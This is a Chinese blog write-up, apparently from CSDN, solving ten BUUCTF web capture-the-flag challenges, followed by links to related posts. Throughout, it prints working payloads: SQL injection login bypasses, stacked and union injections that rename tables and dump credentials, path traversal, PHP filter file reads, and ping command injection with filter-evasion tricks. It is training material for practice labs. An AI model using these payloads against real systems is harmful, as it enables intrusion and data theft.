BUUCTF Web合集1

已于 2023-09-10 14:29:54 修改
阅读量91 收藏
点赞数
文章标签: 网络安全 web安全 php
于 2023-08-21 18:10:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74410605/article/details/132390137
版权

目录

一.[极客大挑战 2019]EasySQL 1

二.[极客大挑战 2019]Havefun 1

三.[HCTF 2018]WarmUp 1

四.[ACTF2020 新生赛]Include 1

五.[ACTF2020 新生赛]Exec 1

六.[GXYCTF2019]Ping Ping Ping 1

七.[强网杯 2019]随便注 1

八.[SUCTF 2019]EasySQL 1

 九.[极客大挑战 2019]Secret File 1

十.[极客大挑战 2019]LoveSQL 1

一.[极客大挑战 2019]EasySQL 1

看到登录框首先用万能密码试一下(万能密码详细见CSDN

密码处还可以用1' or '1' ='1 也可以登陆成功

二.[极客大挑战 2019]Havefun 1

        进入页面发现什么也没有,所以ctrl+u查看网页源代码,往下滑可以看见绿色代码部分(其他部分与题目没多大关系)

         源码解释:变量cat,通过get传参方式对cat传值,如果变量=dog就会有东西输出

        所以返回原页面payload构造:?cat=dog

三.[HCTF 2018]WarmUp 1

        首先查看源码,发现有个source.php

        所以返回原页面,url加上/source.php查看source里的内容,发现就是给出白名单以及过滤了两次问号和进行三次白名单验证(看不懂的函数可以百度搜索)

        

        查看hint.php,发现flag在ffffllllaaaagggg

 根据以上分析,构造payload:/source.php?file=hint.php?../../../../../../ffffllllaaaagggg

../是翻找上级目录,可以多用几个,也可以一个一个试,直到flag出现为止

四.[ACTF2020 新生赛]Include 1

        tips点进去,刚开始觉得页面没有什么有用的信息,首先想到用burp抓包,但也没有什么东西,再认真看页面,发现所在页面就是flag.php,但是没有显示flag,于是想到用php伪协议来读取

        于是构造payload:?file=php://filter/convert.base64-encode/resource=flag.php

        进行base64解码

五.[ACTF2020 新生赛]Exec 1

        看到ping首先想到用127.0.0.1尝试

  看到有数据回显,就试一下抓取flag

127.0.0.1 & cat /flag(注意空格)

六.[GXYCTF2019]Ping Ping Ping 1

思路一:

        首先还是试一下/?ip=127.0.0.1

        

        看到有数据回显,再试一下 /?ip=127.0.0.1 & cat /flag,显示不能有空格

        

         去看了ping的绕过方式,空格绕过方式可以用字符串代替:<、<>、%20(space)、%09(tab)、$IFS$9、${IFS}、$IFS等

所以我尝试用$IFS$9绕过空格(ip等于多少都可以),然后提示不能出现flag

         然后有一个绕过方式是拼接,就是1;a=ag.php;b=fl;cat $b$a

        上图应该是执行成功了,但是没有显示出flag,可以ctrl+u查看源码,得到flag

 思路二:

        从思路一看出来,不能出现flag、空格,说明改题目对用户输入做了限制,尝试找到页面看一下做了哪些过滤,一般试一下index.php

         看见过滤了很多符号、bash、flag等,针对过滤掉的字符找到相应的过滤方法(可以先去看看ping绕过的方法)

        就比如用思路一里的拼接方法

七.[强网杯 2019]随便注 1

        首先看看有没有出现单引号闭合或者双引号闭合情况

       

         显然1=2是错误的,但是它还是给我们回显数据,接着分别尝试用单引号和双引号闭合

 

所以此题是单引号闭合 

然后试一下sql注入里的查询库名语句,发现过滤了

select|update|delete|drop|insert|where|.

          select被过滤,报错注入、盲注等也都没法实现,所以采用堆叠注入

        发现成功查询库名,接着查询表名

有两个表,所以依次查询字段

1';show columns from `1919810931114514`#   (注意是``而不是单引号)

1';show columns from `words`# 

发现1919810931114514表里有flag

        但是很明显无论输入什么都会回显数字1和hahahah,这恰恰对应着words表里的id字段和data字段,说明内部查询语句应该是select id,data from words where id=....

 

         根据猜测的内部查询语句,要想让flag显示出来,我们就要将flag所在的表也就是1919810931114514表名改为words表,增加一个id字段,并且要将flag字段改为data字段。在改19198表名之前,要先将原来的words表名改为其他的名字

1';rename table words to otherword;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);#

 (该代码参考来源BUUCTF [强网杯 2019]随便注 1(两种方法)_hcjtn的博客-CSDN博客

        然后查验有没有成功换名

        成功换名之后,输入1' or 1=1#就可以看见flag

八.[SUCTF 2019]EasySQL 1

        输入一些字符,出现nonono就是表示该字符过滤,尝试用堆叠注入依次查询库名、表名

 

          接着输入1;show columns from `Flag`#发现不行。然后发现除了0输入任何数字都会显示1输入字母却不显示

select 0 || flag --->返回结果为0

select 1 || flag --->返回结果为1

select 2 || flag --->返回结果为1

select a || flag --->返回结果为0

由以上结果猜测内部查询语句是

select '.$POST['query'].' || flag from Flag

所以只需要填*,1就能得出flag

就是select  *,1 || flag from Flag  --->  select  *,1 from Flag

这里的*就相当于通配符,然后1就是在Flag表里增加一行1数据

 九.[极客大挑战 2019]Secret File 1

        首先查看网页源码,发现有个room.php点击它

         发现有个action.php

        到页面去访问/action.php,发现跳转成了end.php

         以上种种自然而然想到用burp抓包看看,发到repeater看看响应,发现有个secr3t.php 

 访问secr3t.php 

        通过上面源代码我们要绕过../  tp  input  data所以想到用php filter伪协议

/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

        然后进行base64解码

十.[极客大挑战 2019]LoveSQL 1

        首先用万能密码登录,登陆成功

        然后就可以随便用简单点的账户密码来测试(可换可不换账号密码)

        用and 1=1和and 1=2发现username是注入点(详细见SQL注入--显错注入(zkaq)_咕噜yay的博客-CSDN博客

        接着查看输出点,发现2,3为输出点 

?username=1' union select 1,2,3-- qwe&password=abc

        

        然后判断字段数,发现字段数为3(其他数字只是显示账号密码错误,当为4时报错不一样)

?username=1' order by 4-- qwe&password=abc-- qwe

        查询库名

username=1' union select 1,2,database()-- qwe&password=abc-- qwe

        查表名,得到表名geekuser,l0ve1ysq1

?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- qwe&password=abc-- qwe

        接着查字段名,得到id,username,password

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'-- qwe&password=abc-- qwe

        接着查数据,得到一大串去寻找flag

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1-- qwe&password=abc-- qwe

咕噜yay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tamevic’s Ctf-Web writeup@BUUCTF Web合集(更新中...)
Tamevic的博客
06-20 837
Tamevic’s Ctf-Web writeup@BUUCTF Web 前言 大学所有课程都结束了,接下来还有考试和其他一些安排就要毕业了。从大二开始一直在说什么时候能有大块空闲时间好好学学ctf,但是课程安排比较紧张,一直没得空。现在好不容易有了大块时间,说开始就开始。 这次选择BUUCTFWeb题,这里题目基本都是历年各大赛事的原题,质量比较高,便于积累。 HCTF2018 WarmUp 环境一起就是一个滑稽…查看源码,提示去看source.php source.php里是源码 经过百度得知这
BUUCTF WEB phpweb1
qq_41696858的博客
12-14 281
打开场景,我惊了,我是你哥哥!!!!!! 好吧,直观的感受。这个页面一直在刷新,搞不好是什么js脚本,看看源码,发现了两个hidden参数 而搜索了页面上warning后,很确定前端请求了后端的date函数,所以页面一直在更新,而且格式有错误 既然我们可以在前端调用后端函数,那么为什么不试试其他函数呢 直接尝试eval,发现有过滤 行吧,试试其他的file_get_contents,没被过滤 于是第一payload: func=file_get_contents&p=index.php 得到了ind
buuctf web backupfile1
qq_41696858的博客
09-03 183
这题属实没什么意思 服务端设置了防扫,一样的思路 dirsearch手动指定线程数或者直接用dirmap倾向于后者,因为dirsearch速度慢下来的话其实优势不大,而且会返回一堆没用的信息 python3 dirmap.py -i http://38ff0b31-866d-467b-8c3d-9ad318c26abe.node4.buuoj.cn:81/ -lcf 扫出来一个index.php.bak 然后审计源码 <?php include_once "flag.php"; if(isset($
BUUCTF WEB blacklist1
qq_41696858的博客
10-27 142
之前做过这题,就当是复习了 堆叠注入得到数据库名,表名,列名 -1';show databases;# //得到库名 -1';show tables;# //得到表名 -1';show columns from FlagHere;#//得到列名 下面就是主要点,select被过滤了,这题考的就是这个的过滤思路,三种思路,可以看我之前的文章 https://blog.csdn.net/qq_41696858/article/details/119513224 但是buuctf的靶场和攻防世界的还不一样,攻防
buuctf web1
qq_61768489的博客
03-11 2895
[极客大挑战 2019]EasySQL [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; ...
BUUCTF WEB HTTP1
qq_41696858的博客
08-22 356
这题考的就是HTTP的几个header 打开页面,查看页面源码,发现secret.php,打开查看,发现it doesn’t come from ‘https://www.Sycsecret.com’ 那么第一个hint就出来了,referer头,加了以后,报第二个错,Please use “Syclover” browser,也很明显,User-Agent:Syclover 加了以后报第三个错,No!!! you can only read this locally!!!,很显现的X-Forwarded-
BUUCTF WEB PYWebsite1
qq_41696858的博客
12-28 453
这题没啥好说的,经典买flag,在页面源码里找到了个这 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829d
BUUCTF Web WarmUp1
qq_52429415的博客
03-07 581
BUUCTF Web WarmUp1 进入网站后发现什么也没有 按F12查看原代码,发现PHP发现新的PHP(hit.php) 发现flag在ffffllllaaaagggg中 仔细分析代码 因为flag在ffffllllaaaagggg中 为了读到ffffllllaaaagggg 可以加?file=source.php?/ffffllllaaaagggg 因为传入后服务器会自动解一次码 所以第二个问号要自己url加密一次 ?file=source.php%3f/ffffllllaaaagggg 因为后来还
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2010
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注 下
BUUCTF WEB 禁止套娃1
qq_41696858的博客
12-08 713
打开场景,空荡荡的,啥也没有 正常思路,扫目录,dirsearch有防扫,dirmap 扫出来.git,源码泄露没跑了 GitHacker跑出来是空文件,我也不知道为啥 GitHack看看能不能找出什么有用的东西,跑出来index.php的源码 源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|ph
BUUCTF部分web题目
05-06
写题记录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTFweb之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全和信息安全
waitaikong_的博客
06-12 630
信息安全网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全网络安全的内容,还延伸到了更广泛的社会和法律层面。
网络安全在个人生活中具体有哪些常见的应用场景?
2301_79955948的博客
06-10 483
通过上述场景可以看出,网络安全在个人生活中扮演着至关重要的角色,它不仅关系到个人隐私和财产安全,也影响到日常生活的方方面面。7. 物联网设备安全网络安全可以保护智能家居、智能设备等物联网设备的安全,避免网络攻击和数据泄露。5. 远程办公和学习:网络安全可以保障企业和学校网络系统的安全和稳定性,避免数据泄露和网络攻击。6. 云存储和备份:网络安全可以保护云存储服务和备份数据的安全,防止黑客攻击和数据泄露。8. 移动设备安全网络安全可以保护移动设备的安全和数据隐私,防止恶意软件和网络攻击。
网络安全攻防演练:提升应急响应能力
最新发布
weixin_64392888的博客
06-14 681
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。
buuctf web
08-15
- *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值